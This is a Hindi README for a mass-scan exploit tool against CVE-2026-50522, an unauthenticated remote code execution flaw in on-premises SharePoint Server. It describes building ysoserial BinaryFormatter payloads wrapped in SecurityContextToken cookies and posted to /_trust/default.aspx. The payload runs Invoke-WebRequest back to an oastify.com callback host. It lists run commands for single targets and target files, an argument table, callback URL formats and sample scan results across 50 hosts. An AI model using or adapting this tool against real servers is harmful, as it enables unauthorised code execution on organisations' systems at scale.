
CVE-2026-50522 PoC
SharePoint Server पर SecurityContextToken कुकी डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
CVE-2026-50522 के लिए मास-स्कैन एक्सप्लॉइट जो ऑन-प्रिमाइसेस Microsoft SharePoint Server को लक्षित करता है। यह /_trust/default.aspx WS-Federation एंडपॉइंट में असुरक्षित BinaryFormatter डिसीरियलाइज़ेशन का दुरुपयोग करके क्राफ्टेड SecurityContextToken कुकीज़ के माध्यम से बिना प्रमाणीकरण के कोड निष्पादन प्राप्त करता है।
नोट: इस प्रोजेक्ट में
ysoserialशामिल है, जो एक जाना-माना पेनिट्रेशन-परीक्षण उपकरण है, इसलिए डाउनलोड के दौरान आपका एंटीवायरस इसे फ़्लैग या क्वारंटीन कर सकता है।
ysoserial.exe TypeConfuseDelegate गैजेट का उपयोग करके BinaryFormatter सीरियलाइज़्ड पेलोड उत्पन्न करता हैInvoke-WebRequest निष्पादित करता हैSecurityContextToken XML संरचना के अंदर लपेटा जाता हैRequestSecurityTokenResponse (WS-Federation) में एम्बेड किया जाता हैwresult पैरामीटर /_trust/default.aspx पर POST किया जाता हैrequests लाइब्रेरी के साथpython CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-t, --target | एकल लक्ष्य URL | - |
-T, --targets | लक्ष्य URL वाली फ़ाइल, प्रति पंक्ति एक | - |
-c, --callback-url | OOB कॉलबैक बेस URL (आवश्यक) | - |
--callback-mode | path या subdomain | path |
--ysoserial | ysoserial.exe का पथ | ysoserial.exe |
-x, --proxy | HTTP प्रॉक्सी | कोई नहीं |
पथ मोड (डिफ़ॉल्ट):
http://YOUR_ID.oastify.com/10.10.10.5
सबडोमेन मोड:
http://10.10.10.5.YOUR_ID.oastify.com
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]
[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed